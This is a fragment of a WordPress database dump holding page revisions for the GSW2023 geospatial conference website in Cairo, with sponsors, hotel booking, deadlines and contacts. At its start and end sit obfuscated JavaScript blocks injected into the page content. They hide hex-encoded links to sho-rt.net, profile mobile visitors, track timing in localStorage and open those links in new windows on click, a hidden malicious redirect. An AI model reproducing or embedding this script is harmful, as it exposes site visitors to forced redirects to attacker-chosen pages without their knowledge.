_0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-05-17 04:48:35','2023-05-17 04:48:35','',3066,'https://gsw2023.com/?p=4515',0,'revision','',0),
(4516,1,'2023-05-17 04:50:13','2023-05-17 04:50:13','[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201412150{margin-top: 100px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]\r\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]\r\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\r\n<span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684272005765{margin-top: -25px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"300\" height=\"124\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\r\n<a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\r\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner]\r\n\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\" css=\".vc_custom_1684297727133{margin-top: 25px !important;}\"][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3287|url^https://gsw2023.com/wp-content/uploads/2022/11/intercontinental-cairo-7836282477-2x1-1.jpg|caption^null|alt^null|title^intercontinental-cairo-7836282477-2x1|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\"][vc_column][ultimate_heading main_heading=\"BOOK YOUR HOTEL NOW\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\" margin_design_tab_text=\"\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #000080;\"><strong><a style=\"color: #000080;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Conference Venue </a></strong></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000080; font-size: 24pt;\"><strong>(InterContinental Cairo Semiramis)</strong></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #000080;\"><strong><a style=\"color: #000080;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Special Rate Booking is Opened Now</a></strong></span></h4>\r\n[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684297351791{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]\r\n<h3>[vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</h3>\r\n<h3></h3>\r\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\r\n[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):            .</strong>\r\n\r\n<strong><del>April 15, 2023</del> ,</strong>\r\n\r\n<strong> May 15, 2023  (hard deadline, no extension)</strong>\r\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification:</strong>\r\n\r\n<strong><del>May 15, 2023</del>, May 21, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<h5><span style=\"font-size: 14pt; color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Conference Venue Special Rate Booking is Opened Now</a></strong></span></h5>\r\n[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n&nbsp;\r\n<h3></h3>\r\n[/vc_column_text][vc_column_text css=\".vc_custom_1682772322645{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023,at the InterContinental Cairo Semiramis,Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n&nbsp;\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\